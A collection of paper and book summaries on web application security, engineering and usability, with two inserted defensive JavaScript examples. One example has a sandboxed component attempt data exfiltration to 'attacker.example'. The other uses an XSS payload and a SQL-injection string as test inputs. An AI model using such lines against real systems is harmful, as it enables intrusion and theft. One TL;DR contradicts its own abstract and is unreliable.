TL;DR: Michal Zalewski examines the entire browser security model, revealing weak points and providing crucial information for shoring up web application security in The Tangled Web.
Abstract: "Thorough and comprehensive coverage from one of the foremost experts in browser security." --Tavis Ormandy, Google Inc. Modern web applications are built on a tangle of technologies that have been developed over time and then haphazardly pieced together. Every piece of the web application stack, from HTTP requests to browser-side scripts, comes with important yet subtle security consequences. To keep users safe, it is essential for developers to confidently navigate this landscape. In The Tangled Web, Michal Zalewski, one of the world's top browser security experts, offers a compelling narrative that explains exactly how browsers work and why they're fundamentally insecure. Rather than dispense simplistic advice on vulnerabilities, Zalewski examines the entire browser security model, revealing weak points and providing crucial information for shoring up web application security. You'll learn how to: perform common but surprisingly complex tasks such as URL parsing and HTML sanitization; use modern security features like Strict Transport Security, Content Security Policy, and Cross-Origin Resource Sharing; leverage many variants of the same-origin policy to safely compartmentalize complex web applications and protect user credentials in case of XSS bugs; build mashups and embed gadgets without getting stung by the tricky frame navigation policy; and embed or host user-supplied content without running into the trap of content sniffing. For quick reference, "Security Engineering Cheat Sheets" at the end of each chapter offer ready solutions to problems you're most likely to encounter. With coverage extending as far as planned HTML5 features, The Tangled Web will help you create secure web applications that stand the test of time.
TL;DR: This work proposes WebJail, a novel client-side security architecture to enable least-privilege integration of components into a web mashup, based on high-level policies that restrict the available functionality in each individual component.
Abstract: In the last decade, the Internet landscape has transformed from a mostly static world into Web 2.0, where the use of web applications and mashups has become a daily routine for many Internet users. Web mashups are web applications that combine data and functionality from several sources or components. Ideally, these components contain benign code from trusted sources. Unfortunately, the reality is very different. Web mashup components can misbehave and perform unwanted actions on behalf of the web mashup's user. Current mashup integration techniques either impose no restrictions on the execution of a third-party component, or simply rely on the Same-Origin Policy. A least-privilege approach, in which a mashup integrator can restrict the functionality available to each component, cannot be implemented with the current integration techniques without ownership of the component's code. We propose WebJail, a novel client-side security architecture that enables least-privilege integration of components into a web mashup, based on high-level policies that restrict the functionality available to each individual component. The policy language was synthesized from a study and categorization of sensitive operations in the upcoming HTML5 JavaScript APIs, and full mediation is achieved through deep aspects in the browser. We have implemented a prototype of WebJail in Mozilla Firefox 4.0 and applied it successfully to mainstream platforms such as iGoogle and Facebook. In addition, microbenchmarks registered a negligible performance penalty for page load time (7ms) and a negligible execution overhead for sensitive operations (0.1ms).
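A user-level sketch of the policy-mediated integration the abstract describes, as an added example that is not WebJail's own code. A per-component policy is enforced by wrapping every sensitive operation so a component can only call what its policy grants; categories the policy does not mention are denied. The category names, the rule shape (`"allow"`, `"deny"`, or an array of allowed argument prefixes) and the stand-in APIs are assumptions for illustration, not WebJail's policy language, and a Proxy in page script stands in for WebJail's in-browser deep-aspect interception, which is what makes the real system's mediation complete.

```javascript
// Added example (not WebJail's code): least-privilege mediation of
// "sensitive operations" for a mashup component via a per-component policy.
// WebJail enforces this inside the browser with deep aspects; this sketch
// wraps constructed stand-in APIs with a Proxy, which is only sound if the
// component cannot reach the unwrapped objects (e.g. through globals).

// Constructed stand-ins for a few HTML5-style APIs (no browser needed).
function makeSensitiveApis() {
  const store = new Map();
  return {
    geolocation: {
      getCurrentPosition(cb) {
        cb({ coords: { latitude: 51.0, longitude: 4.7 } }); // constructed fix
      },
    },
    storage: {
      setItem(key, value) { store.set(key, String(value)); },
      getItem(key) { return store.has(key) ? store.get(key) : null; },
    },
    network: {
      fetch(url) { return { url, status: 200 }; }, // pretend the request succeeded
    },
  };
}

class PolicyViolation extends Error {
  constructor(category, op, detail) {
    super(`policy denies ${category}.${op}${detail ? ` for ${detail}` : ""}`);
    this.name = "PolicyViolation";
    this.category = category;
    this.op = op;
  }
}

// Policy shape (assumed, not WebJail's syntax): per category either "allow",
// "deny", or an array of allowed argument prefixes (a whitelist, e.g. of URLs).
// Categories the policy does not mention are denied: default-deny.
function makeJail(apis, policy) {
  const jailed = {};
  for (const category of Object.keys(apis)) {
    const rule = Object.prototype.hasOwnProperty.call(policy, category) ? policy[category] : "deny";
    jailed[category] = new Proxy(apis[category], {
      get(target, op) {
        const member = target[op];
        if (typeof member !== "function") return member;
        // Every call passes through this check: full mediation of the category.
        return (...args) => {
          if (rule === "deny") throw new PolicyViolation(category, op);
          if (Array.isArray(rule)) {
            const first = String(args[0]);
            if (!rule.some((prefix) => first.startsWith(prefix))) {
              throw new PolicyViolation(category, op, first);
            }
          } else if (rule !== "allow") {
            throw new PolicyViolation(category, op, "malformed rule");
          }
          return member.apply(target, args);
        };
      },
      // Components may not replace or add methods on the mediated objects.
      set(_target, op) { throw new PolicyViolation(category, `set ${String(op)}`); },
    });
  }
  return Object.freeze(jailed);
}

// Run a component against its jail; a denied operation aborts that component
// only, reporting which operation the policy blocked.
function runComponent(component, jail) {
  const log = [];
  try {
    component(jail, (msg) => log.push(msg));
    return { ok: true, log, violation: null };
  } catch (err) {
    if (err instanceof PolicyViolation) return { ok: false, log, violation: err.message };
    throw err;
  }
}

// Two constructed components: a weather gadget that stays within its policy,
// and one that tries to persist data and contact a host it was not granted.
function weatherGadget(api, log) {
  api.geolocation.getCurrentPosition((pos) => {
    const res = api.network.fetch(`https://api.weather.example/v1?lat=${pos.coords.latitude}`);
    log(`weather status ${res.status}`);
  });
}
function leakyGadget(api, log) {
  log("about to exfiltrate");
  api.storage.setItem("stolen", "secret"); // storage is not in the policy: denied
  api.network.fetch("https://attacker.example/collect");
}

const weatherPolicy = { geolocation: "allow", network: ["https://api.weather.example/"] };
const apis = makeSensitiveApis();
const weatherResult = runComponent(weatherGadget, makeJail(apis, weatherPolicy));
const leakyResult = runComponent(leakyGadget, makeJail(apis, weatherPolicy));
// weatherResult.ok === true; leakyResult.violation === "policy denies storage.setItem"
```

The integrator writes the policy, not the component author, which is the ownership point the abstract makes: the gadget's code is unchanged, and the whitelist on `network` is what stops the second component before its exfiltration call is ever reached.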
TL;DR: An empirical analysis of a large number of web vulnerability reports, aimed at understanding how input validation flaws have evolved in the last decade, suggests that the complexity of the attacks has not changed significantly and that many web problems are still simple in nature.
Abstract: Web applications have become important services in our daily lives. Millions of users use web applications to obtain information, perform financial transactions, have fun, socialize, and communicate. Unfortunately, web applications are also frequently targeted by attackers. Recent data from the SANS Institute estimate that up to 60% of Internet attacks target web applications.
In this paper, we perform an empirical analysis of a large number of web vulnerability reports with the aim of understanding how input validation flaws have evolved in the last decade. In particular, we are interested in finding out whether developers are more aware of web security problems today than they were in the past. Our results suggest that the complexity of the attacks has not changed significantly and that many web problems are still simple in nature. Hence, despite awareness programs provided by organizations such as MITRE, the SANS Institute and OWASP, application developers seem to be either unaware of these classes of vulnerabilities or unable to implement effective countermeasures. Therefore, we believe that there is a growing need for languages and application platforms that attack the root of the problem and secure applications by design.
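To make the study's point concrete, an added example that is not from the paper, with constructed inputs: the kind of simple flaw it describes (untrusted input concatenated into HTML) beside a rendering path of the "secure by design" kind its closing sentence argues for, where the template helper escapes every interpolated value so a developer cannot forget to, and a structured field is validated against an allowlist before it reaches any interpreter. The `html` tag, `parseCommentId` and the sample payload are illustrative names and data, not anything the paper defines.

```javascript
// Added example, not the paper's code. Constructed inputs show the simple
// input-handling flaw the study found still common, next to a version that
// is safe by construction: output encoding is done by the template helper,
// so a developer cannot forget it, and structured fields are validated
// against an allowlist before they reach any interpreter.

// Vulnerable: untrusted strings are concatenated straight into markup.
function renderCommentUnsafe(author, body) {
  return `<li><b>${author}</b>: ${body}</li>`;
}

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Tagged template: every interpolated value is escaped; only literal template
// text (written by the developer) is emitted verbatim.
function html(strings, ...values) {
  let out = "";
  strings.forEach((chunk, i) => {
    out += chunk;
    if (i < values.length) out += escapeHtml(values[i]);
  });
  return out;
}

// Hardened: same markup, but the author cannot bypass encoding.
function renderCommentSafe(author, body) {
  return html`<li><b>${author}</b>: ${body}</li>`;
}

// Allowlist validation for a structured field: a comment id must be a
// positive decimal integer and nothing else (no whitespace, sign or suffix),
// so it can never carry query syntax into a database or file lookup.
function parseCommentId(raw) {
  if (typeof raw !== "string" || !/^[1-9][0-9]{0,9}$/.test(raw)) return null;
  return Number(raw);
}

// Sample untrusted inputs (constructed): a script-injecting comment body and
// an id parameter carrying injection syntax.
const samples = {
  author: "mallory",
  body: '<img src=x onerror="alert(1)">',
  idOk: "42",
  idBad: "42 OR 1=1",
};
// renderCommentUnsafe(samples.author, samples.body) emits the payload verbatim;
// renderCommentSafe(...) emits &lt;img src=x onerror=&quot;alert(1)&quot;&gt;
// parseCommentId(samples.idOk) === 42, parseCommentId(samples.idBad) === null
```

The unsafe renderer is exactly the one-line mistake the study says has not changed in a decade; the fix is not cleverer filtering of `body` but moving the encoding decision out of the developer's hands.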
TL;DR: This comprehensive collection aims to emphasize the interconnections between the two research areas and to highlight the benefits of combined use of BI and Web practices.
Abstract: Business Intelligence Applications and the Web: Models, Systems and Technologies summarizes current research advances in BI and the Web, emphasizing research solutions, techniques, and methodologies that combine both areas in the interest of building better BI solutions. This comprehensive collection aims to emphasize the interconnections between the two research areas and to highlight the benefits of combined use of BI and Web practices, which so far have acted rather independently, often in cases where their joint application would have been sensible.
TL;DR: A critical review of how model-driven web engineering methods support the handling of web application requirements, showing their current limitations and strengths.
Abstract: Model-driven development has become increasingly important in recent years. In the context of web application development, many web engineering methods that propose model-driven development processes have appeared. However, the earlier stages of these processes are seldom considered, and few of these methods rigorously face the problems of specifying web application requirements and translating them into the proper conceptual model, even though it is widely recognized that requirements engineering activities are essential to obtain quality software products. This article surveys model-driven web engineering methods in a comparative study and analyzes the techniques proposed for specifying functional, data and navigational requirements, as well as the mechanisms provided for automatically translating these requirements into conceptual models. Our main goal is to provide a critical view of the support these methods offer for handling web application requirements, in order to show their current limitations and strengths.
TL;DR: A number of prior challenges and shortcomings of web application development are presented, and it is described how new technologies can be used to solve many of them, based on hands-on experience in building various web-based systems with a number of different web application development technologies.
Abstract: The World Wide Web has evolved from a simple document browsing and distribution environment into a rich software platform in which desktop-style applications are increasingly becoming first class citizens. The document-oriented origins of the Web are still evident in many areas, though, and traditionally it has been difficult to compose truly interactive web applications without using plug-in components or browser extensions such as Flash. However, the ongoing standardization work and emerging technologies such as HTML5, JavaScript 2.0 and WebGL are quickly altering the landscape of web application development. In this paper, we present a number of prior challenges and shortcomings, and describe how new technologies can be used for solving many of the problems. The research is based on our hands-on experiences in building various web-based systems in which a number of different web application development technologies have been used extensively.
TL;DR: This work provides an initial methodology for the analysis of Web-based services, and shows that most of the traffic comes from a small subset of providers, which can be classified manually.
Abstract: Today’s Web provides many different functionalities, including communication, entertainment, social networking, and information retrieval. In this article, we analyze traces of HTTP activity from a large enterprise and from a large university to identify and characterize Web-based service usage. Our work provides an initial methodology for the analysis of Web-based services. While it is nontrivial to identify the classes, instances, and providers for each transaction, our results show that most of the traffic comes from a small subset of providers, which can be classified manually. Furthermore, we assess both qualitatively and quantitatively how the Web has evolved over the past decade, and discuss the implications of these changes.
TL;DR: This paper proposes a systematic way of building intelligent applications based on SWS, providing the development process with steps, techniques and technologies, and describes one experiment concerning the implementation of a real e-learning system using the proposed approach.
TL;DR: Advances in Web-based GIS, Mapping Services and Applications will appeal to academia and researchers, application specialists and developers, practitioners, and undergraduate and graduate students interested in distributed and web-based geoinformation systems and applications, geodatabases, and digital mapping.
Abstract: Advances in Web-based GIS, Mapping Services and Applications is published as part of ISPRS WG IV/5 effort, and aims at presenting (1) Recent technological advancements, e.g., new developments under Web 2.0, map mashups, neogeography and the like; (2) Balanced theoretical discussions and technical implementations; (3) Commentary on the current stages of development; and (4) Prediction of developments over the next decade. Containing 21 contributions from 60 researchers active within ISPRS communities, most of them from academia and some from governments, the book covers a wide range of topics related to the state-of-the-art in web mapping/GIS and geographic information services. The volume is organized in five sections: 1. Analytical and Geospatial Services; 2. Performance; 3. Augmentation and LBS; 4. Collaboration and Decision Making, and 5. Open Standards for Geospatial Services. Supported by a considerable number of technical details and examples, an overall view of the current achievements and progress made in the field of web-based GIS and mapping services is given. The chapters reflect timely and future developments addressing: constant updating of related web and geospatial technologies as well as the revolution of web mapping caused by mainstream IT vendors such as Google, Yahoo and Microsoft; increased interest from industry on geo-spatial information technologies; and increasing demand from the general public for prompt and effective spatial information services. Advances in Web-based GIS, Mapping Services and Applications will appeal to academia and researchers, application specialists and developers, practitioners, and undergraduate and graduate students interested in distributed and web-based geoinformation systems and applications, geodatabases, and digital mapping.
TL;DR: This article attempts to provide a comprehensive review of the state-of-the-art approaches to web adaptation for mobile handheld devices and categorizes, synthesizes, and compares the pros and cons of major adaptation methods.
Abstract: Proliferation of mobile handheld devices and the significant advancement of wireless technologies and infrastructures have become a strong driving force of many mobile applications, including ubiquitous web information access through those devices. Despite the tremendous flexibility, accessibility, and convenience, rendering and navigating Web content on handheld devices suffer from significant usability problems attributable to their physical constraints, especially the small screen size, restricted interaction mechanisms, and low memory. Therefore, improving the effectiveness of web content navigation on those devices is crucial and has attracted increasing attention from both academics and industry. One of the promising solutions is adaptation, which focuses on the content restructuring, rearranging, and visualization. This article attempts to provide a comprehensive review of the state-of-the-art approaches to web adaptation for mobile handheld devices. The study not only categorizes, synthesizes, and...
TL;DR: This paper proposes Rest Thing, a RESTful web service infrastructure based on REST principles that hides the heterogeneity of devices and provides a seamless way to integrate embedded devices with existing web applications.
Abstract: In the field of Cyber Physical Systems and Pervasive Computing, physical resources and web resources can be easily handled and seamlessly integrated into our lives. However, due to the heterogeneity of devices and the tight coupling of individual information systems, developers cannot easily create their specific applications by combining physical and web resources. In this paper, we propose Rest Thing, a RESTful web service infrastructure based on REST principles that hides the heterogeneity of devices and provides a seamless way to integrate embedded devices with existing web applications. In addition, we implemented a prototype system that exposes wireless sensors through RESTful interfaces, and built a demo application on a smartphone to collect and merge physical and web resources. Finally, we give a performance evaluation of the prototype system.
TL;DR: Because almost any legacy application can be wrapped as a Web service using the described approach, this form of delivery may be recommended as a general alternative to traditional deployment solutions.
Abstract: Web services are a new technology that enables the integration of applications running on different platforms, primarily by using XML to enable communication among different computers over the Internet. A large number of applications were designed as stand-alone systems before the concept of Web services was introduced, and it is a challenge to integrate them into larger computational networks. A generally applicable method of wrapping stand-alone applications into Web services was developed and is described. To test the technology, it was applied to QikProp for DOS (Windows). Although the performance of the application did not change when it was delivered as a Web service, this form of deployment offered several advantages, such as simplified and centralized maintenance, a smaller number of licenses, and practically no training for the end user. Because almost any legacy application can be wrapped as a Web service using the described approach, this form of delivery may be recommended as a general alternative to traditional deployment solutions.
TL;DR: The review shows that current industrial development practice lacks a comprehensive approach to RIA development that supports all the development steps from design to implementation, test and maintenance, and that helps identify correct design choices.
Abstract: Rich Internet Applications (RIAs) are widely adopted Web applications that add the richer interaction, presentation, and client-side computation capabilities of desktop applications to the Web. However, the evolution from Web applications towards RIAs comes at the cost of increased complexity in their development. For this reason, a wide variety of tools and technologies have been proposed in order to streamline their development effort. This paper investigates the current state of the art of RIA development approaches. The review shows that current industrial development practice lacks a comprehensive approach to RIA development that supports all the development steps from design to implementation, test and maintenance, and that helps identify correct design choices. This is in part due to the severe fragmentation of current RIA technologies, which prevents the adoption of a commonly recognized set of best practices and results in ad-hoc development processes. These aspects are in part treated by research methodologies and some innovative industrial solutions, but these approaches also present some limitations. The paper identifies future research directions for RIAs to fully support their development process and to support their design in a more comprehensive and systematic way, from both industrial and research perspectives.
TL;DR: This book addresses the major issues in Web data management related to technologies and infrastructures, methodologies and techniques, as well as applications and implementations.
Abstract: This book addresses the major issues in Web data management related to technologies and infrastructures, methodologies and techniques, as well as applications and implementations. Emphasis is placed on Web engineering and technologies, Web graph management, searching and querying, and the importance of the social Web.
TL;DR: The research categorizes organization types into Customer Intimacy, Operational Excellence and Product Leadership, based on the Value Disciplines model, to discuss the influence of Web 2.0 concepts on web strategy formulation for organizations with differing requirements, characteristics and objectives.
TL;DR: This paper discusses the direct implications of a lack of security and the importance of quality in the software development life cycle (SDLC), and proposes a set of automated security tools and methodologies that can be used throughout the SDLC as a means to improve the security and quality of critical web-based applications.
Abstract: The Internet, and in particular the World Wide Web, has become one of the most common communication mediums in the world. Millions of users connect every day to different web-based applications to search for information, exchange messages, interact with each other, conduct business, pay taxes, perform financial operations and much more. Some of these critical web-based services are targeted by malicious users intending to exploit possible weaknesses and vulnerabilities, which could cause not only the disruption of the service but also the compromise of users' and organizations' information. Most of the time, these malicious users succeed in exploiting different types of vulnerabilities, and the consequences can be disastrous. Most of these vulnerabilities are directly related to the web-based applications' lack of quality, resulting from a poorly implemented software development life cycle (SDLC). This paper discusses the direct implications of a lack of security and the importance of quality in the SDLC, and the major factors that influence them. The authors also propose a set of automated security tools and methodologies that can be used throughout the SDLC as a means to improve the security and quality of critical web-based applications.
TL;DR: The concept of Web 2.0 has spread into other disciplines and changed the entire mode of practice in library science as well, and a new concept of Library 2.0 has been introduced.
Abstract: Introduction The history of the Internet is not long, and almost all historians agree that it starts with ARPANET (Advanced Research Projects Agency NETwork), the very first shape of the Internet, which was developed by DARPA (Defense Advanced Research Projects Agency). Until 1992, the Internet was available at educational and government institutions. In 1992 commercial companies started taking control of developing this wonderful phenomenon. The invention of the Internet was a paradigm shift in the history of networks and network communication. In the beginning, static web pages were created for one-way communication and were read-only for visitors. Hyper Text Markup Language (HTML) was widely used for web publishing. This initial form of the web was later named Web 1.0. The term Web 2.0 was popularized in 2004; it was first used by Darcy DiNucci in 1999. Web 2.0 can be defined in terms of its features and specific technologies, or its social impact. In other words, the World Wide Web (www) provided the base for Web 2.0 applications to create a new communication environment (Linh, 2008). It is a second wave that covers web tools and services (Macaskill and Owen, 2006). Davis (2005) describes Web 2.0 as an attitude, not a technology, and Birdsall (2007) believes that Web 2.0 is a social movement. Web 2.0 applications also differ from Web 1.0 applications in their frequency of usage. As Web 2.0 applications are socially rich and community building is their core, their usage is many times greater than that of Web 1.0 static websites/applications. Boateng, Mbtika & Thomas (2010) define Web 2.0 as a set of trends and tools for using the Internet. They further explain that these socio-technological innovations have enabled interactivity and the gathering of knowledge through experience and practice on a global scale. 
The concept of collaborative work, social networking and the ease of use of these applications has brought a significant change in the Internet usage style of Internet surfers around the world. The popularity of social networking applications, blogs and media sharing has also changed the ways and behavior of library users all over the world. The concept of Web 2.0 has spread into other disciplines and changed the entire mode of practice in library science as well, and a new concept of Library 2.0 has been introduced. Library 2.0 is the application of interactive, collaborative, and multimedia web-based technologies to web-based library services and collections (Maness, 2006). The real advantage of Library 2.0 can be achieved only by adding advanced functionality and features directly into the content (Abram, 2005). Aharony (2008) has emphasized that library schools must come up with an upgraded curriculum by introducing a Web 2.0 course. According to him, Web 2.0 applications may be thoroughly taught as a separate course in the LIS curriculum. It will equip library professionals with the skills and competencies necessary to design dynamic, modern, user-oriented services. A brief description of a few Web 2.0 applications follows: Blog (Web Log) is a major application of the Web 2.0 era. Blogs are new forms of publication (Maness, 2006). Blogging is an easy process of publishing ideas on the web and getting comments from other web users. It is a one-click process of publishing posts. Blogs are a relatively recent Internet phenomenon dating from the late 1990s (Clyde, 2004). Hane (2001) says that blogs are a natural for librarians. Libraries all over the world are using blogs for easy dissemination of information to targeted users. Blogs are the fastest growing medium of information on the World Wide Web. 
Most of the time, blogs are created as single-person effort but some blogs are created and published as cooperative or group projects (Clyde, 2004). …
TL;DR: The proposed methodology in conjunction with the model, set of attributes, and measuring instruments is appropriate for evaluating quality in use of Web 2.0 applications and the analysis of qualitative data reveals that performance and effort based attributes considerably contribute to mind mapping services success.
Abstract: Research in Web quality has addressed quality in use as the most important factor affecting a wide acceptance of software applications. It can be conceived as comprising two complementary concepts, that is, usability and user experience, which accounts for the employment of more user-centred evaluations. Nevertheless, in the context of Web 2.0 applications, this topic has still not attracted sufficient attention from the HCI community. This paper addresses the quality in use of Web 2.0 applications on the case of mind mapping services. The evaluation methodology brings together three complementary methods. The estimated quality in use is measured by means of the logging actual use method, while the perceived quality in use is evaluated by means of the retrospective thinking aloud (RTA) method and a questionnaire. The contribution of our work is twofold. Firstly, we provide empirical evidence that the proposed methodology in conjunction with the model, set of attributes, and measuring instruments is appropriate for evaluating quality in use of Web 2.0 applications. Secondly, the analysis of qualitative data reveals that performance and effort based attributes considerably contribute to mind mapping services success.
TL;DR: It is shown that modern Web applications present very diverse traffic patterns, and a method to isolate and capture browser-generated traffic and plot time series with an RRDTool database is described.
Abstract: HTTP has been the most popular Internet protocol for 30 years. Until recently, its role was limited to the traditional transfer of hypertext documents. However, its flexibility and interoperability cause it to be progressively involved in a much wider range of applications, from video and audio streaming to email, chat and document editing. Understanding the behavior of modern Web applications is a crucial step in applying QoS or security policies to this traffic. This paper studies 20 popular Web applications that are representative of 12 application types. We describe a method to isolate and capture browser-generated traffic and plot time series with an RRDTool database. We show that modern Web applications present very diverse traffic patterns, and propose a description and classification of these patterns.
TL;DR: This work presents WebSpec, a domain-specific language for specifying the most relevant and characteristic requirements of Web applications: those involving interaction and navigation, and describes WebSpec diagrams, discussing their abstraction and expressive power.
Abstract: Web application development is a complex and time-consuming process that involves different stakeholders (ranging from customers to developers); these applications have some unique characteristics like navigational access to information, sophisticated interaction features, etc. However, there have been few proposals to represent those requirements that are specific to Web applications. Consequently, validation of requirements (e.g., in acceptance tests) is usually informal and as a result troublesome. To overcome these problems, we present WebSpec, a domain-specific language for specifying the most relevant and characteristic requirements of Web applications: those involving interaction and navigation. We describe WebSpec diagrams, discussing their abstraction and expressive power. With a simple though realistic example, we show how we have used WebSpec in the context of an agile Web development approach discussing several issues such as automatic test generation, management of changes in requirements, and improving the understanding of the diagrams through application simulation.
TL;DR: The paper emphasizes the limitations of current Web technologies and how future trends may address them, focusing on the migration witnessed in the scope of the applications presented and the features delivered on the Web, from a user's perspective.
Abstract: The current generation of Web applications (Web 2.0) has made them an outright phenomenon in today’s society, helping to redefine the way organisations and individuals communicate and collaborate with each other. The purpose of this paper is to conceptualise the evolution of Web technologies from a user perspective. Based on inference from existing studies, this paper attempts to identify the architectural direction that the next generation (Web 3.0) of Web applications will take. The paper emphasizes the limitations of current Web technologies and how future trends may address them, focusing on the migration witnessed in the scope of the applications presented and the features delivered on the Web, from a user's perspective.
TL;DR: The author presents and classifies the existing metrics for Web Services, discusses their usage and benefits, highlights the problems found in using some of the metrics, and discusses what is still lacking in this domain.
Abstract: Web Services have emerged as a new web-based technology paradigm for exchanging information on the Internet using platform-neutral standards, such as XML, and adopting Internet-based protocols. They have become a promising technology for designing and building complex inter-enterprise business applications. However, Web Services are problematic to measure, control, and manage. Software metrics are vital for the management, control, and measurement of software development, and despite the vast number of techniques, mechanisms and metrics for traditional and object-oriented software, there has been little research dealing with metrics for Web Services. As companies increasingly invest in and rely on Web Services, the importance of metrics for those services continues to grow. In this paper the author presents and classifies the existing metrics for Web Services and discusses their usage and benefits. In addition, the author highlights the problems found in using some of the metrics and discusses what is still lacking in this domain.
TL;DR: A model of RESTful systems based on a finite-state machine formalism is presented, showing that the model enables intuitive formalization of many of REST's constraints, including the uniform interface, stateless client-server operation, and code-on-demand execution.
Abstract: Representational State Transfer (REST), as an architectural style for distributed hypermedia systems, enables scalable operation of the World Wide Web (WWW) and is the foundation for its future evolution. However, although described over 10 years ago, no comprehensive formal model for representing RESTful systems exists. The lack of a formal model has hindered understanding of the REST architectural style and the WWW architecture, consequently limiting Web engineering advancement. In this paper we present a model of RESTful systems based on a finite-state machine formalism. We show that the model enables intuitive formalization of many of REST's constraints, including the uniform interface, stateless client-server operation, and code-on-demand execution. We describe the model's mapping to a system-level view of operation and apply the model to an example Web application. Finally, we outline the benefits of the model, ranging from a better understanding of REST to designing frameworks for RESTful system development.
TL;DR: Research is presented that aims at developing a methodology to facilitate the analysis and comparison of evaluated Web 2.0 applications.
Abstract: Quality in use comprises two seemingly different though interlocking concepts: usability and user experience. Consequently, complementary evaluation of pragmatic and hedonic attributes could significantly affect the acceptance of software applications. However, in the context of Web 2.0 applications this topic has still not attracted enough attention from the HCI community. Therefore we present research aimed at developing a methodology that would facilitate the analysis and comparison of evaluated Web 2.0 applications.
TL;DR: What characterizes usable websites with reference to cultural needs of the user, specific web features applicable to cultural dimension that can enhance cultural understanding and help web designers to customize the web sites to specific cultures are identified.
Abstract: Cultural characteristics of users play a significant role in their interactions with and understanding of web-based systems. Hence, consideration of cultural issues in the design of a web-based system can improve the usability of such a system. The relation between culture and the internet is symbiotic, that is, experience obtained from using the internet (with its rich cultural diversity) can also have an influence on the local culture. This makes culture a moving target. However, to date, not much research has been done about which cultural issues influence the usability of websites and the level of that influence. This paper examines theoretically the cultural issues that influence web design/usability and the significance of this influence to the general usability of a website, and also establishes how culture can be utilized to develop more usable websites. Thus the main contribution of this study is to identify what characterizes usable websites with reference to the cultural needs of the user, and the specific web features applicable to the cultural dimension that can enhance cultural understanding and help web designers to customize web sites to specific cultures.
TL;DR: An environment to enable people without programming knowledge to create mashups composed of Web components selected directly from existing Web applications, and the underlying architecture of the environment is presented.
Abstract: We present an environment to enable people without programming knowledge to create mashups composed of Web components selected directly from existing Web applications. The authoring environment allows the creation of communication among components originally belonging to different applications. We report on some example applications, the underlying architecture of the environment, and a first user test.
TL;DR: In this paper, a set of automated security tools and methodologies that can be used throughout the SDLC as a means to improve the security and quality of critical web-based applications are presented. But the authors do not discuss the direct impact of the lack of security and the importance of quality on the SDLC and the major factors that influence them.
Abstract: The Internet, and in particular the World Wide Web, has become one of the most common communication mediums in the world. Millions of users connect every day to different web-based applications to search for information, exchange messages, interact with each other, conduct business, pay taxes, perform financial operations and much more. Some of these critical web-based services are targeted by malicious users intending to exploit possible weaknesses and vulnerabilities, which could cause not only the disruption of the service, but also compromise the users' and organizations' information. Most of the time, these malicious users succeed in exploiting different types of vulnerabilities and the consequences can be disastrous. Most of these vulnerabilities are directly related to the web-based applications' lack of quality as a result of a poorly implemented software development life cycle (SDLC). This paper will discuss the direct implication of the lack of security and the importance of quality on the SDLC, and the major factors that influence them. On the other hand, the authors propose a set of automated security tools and methodologies that can be used throughout the SDLC as a means to improve the security and quality of critical web-based applications.
TL;DR: This article expands on a prior usability study that examined the performance of 112 older adults who were asked to solve two problems using the U.S. government's Medicare.gov Web site, and demonstrates that very few of the study participants were able to successfully negotiate the solution to the problem.
Abstract: A large number of health-related Web sites currently exist that offer consumers a wealth of information that can be used to enhance the quality of their lives. Much less attention has been given to Web sites that can support complex health-related problem solving, as opposed to more general information search activities, of user populations such as older adults. In this article, we expand on a prior usability study that examined the performance of 112 older adults who were asked to solve two problems using the U.S. government's Medicare.gov Web site. The indications from that study were that older adults had difficulty carrying out these problem-solving tasks. This article illustrates, in the context of a case study, the use of a structured methodology for obtaining insights into Web site design issues that could make it difficult for healthcare consumers such as older adults to solve health-related problems. Initially, a number of Web design guidelines that have been developed for older users are presented. The argument is made that such checklist-type guidelines, though essential, are difficult to apply to complex Web-based problem-solving activities. Following a review of research in the area of Web-based health information seeking and problem-solving by older adults, the description and implementation of a methodology for aiding designers in anticipating cognitive demands that older users might confront during their problem-solving activities is presented. Detailed analysis of task performance is then presented to demonstrate that very few of the study participants were able to successfully negotiate the solution to the problem. The use of the methodology for identifying a number of user-Web site interaction issues and for proposing recommendations particularly relevant to older users, and ultimately for enhancing the accessibility of health Web sites, is highlighted. Finally, a detailed framework is presented that is intended for guiding designers in the application of this methodology.
TL;DR: WEBDIFF is the first technique to apply concepts from computer vision and graph theory to identify cross-browser issues in web applications; it is practical and can find issues in real-world web applications.
Abstract: Cross-browser issues are prevalent in web applications. However, existing tools require considerable manual effort from developers to detect such issues. Our technique and prototype tool, WEBDIFF, detects such issues automatically and reports them to the developer. Along with each issue reported, the tool also provides details about the affected HTML element, thereby helping the developer to fix the issue. WEBDIFF is the first technique to apply concepts from computer vision and graph theory to identify cross-browser issues in web applications. Our results show that WEBDIFF is practical and can find issues in real-world web applications.
TL;DR: The proposal to model Web Accessibility by moving from abstract to concrete architectural views using aspect-orientation is introduced; it takes advantage of modeling Accessibility as an aspect-oriented concern, which is independently treated but related to architectural pieces.
Abstract: Usually, a huge number of tools and proposals help developers assess the Accessibility of Web applications; however, from the designer's perspective, there is no similar situation. It seems that creating accessible Web sites is more expensive and complicated than creating Web sites and then assessing/modifying them. Although this feeling may be largely true, the benefits of modeling Accessibility at early design stages outweigh the needs of a developer to implement that Accessibility. A designer can learn the basics of Web Accessibility and then he/she should be able to incorporate this knowledge into his/her software architecture. The point is to have an idea of how to do so from the beginning. In this paper, we briefly introduce our proposal to model Web Accessibility by moving from abstract to concrete architectural views using aspect-orientation. Our approach takes advantage of modeling Accessibility as an aspect-oriented concern, which is independently treated but related to architectural pieces. We illustrate the approach with a case study and elaborate some insights from the designer's perspective.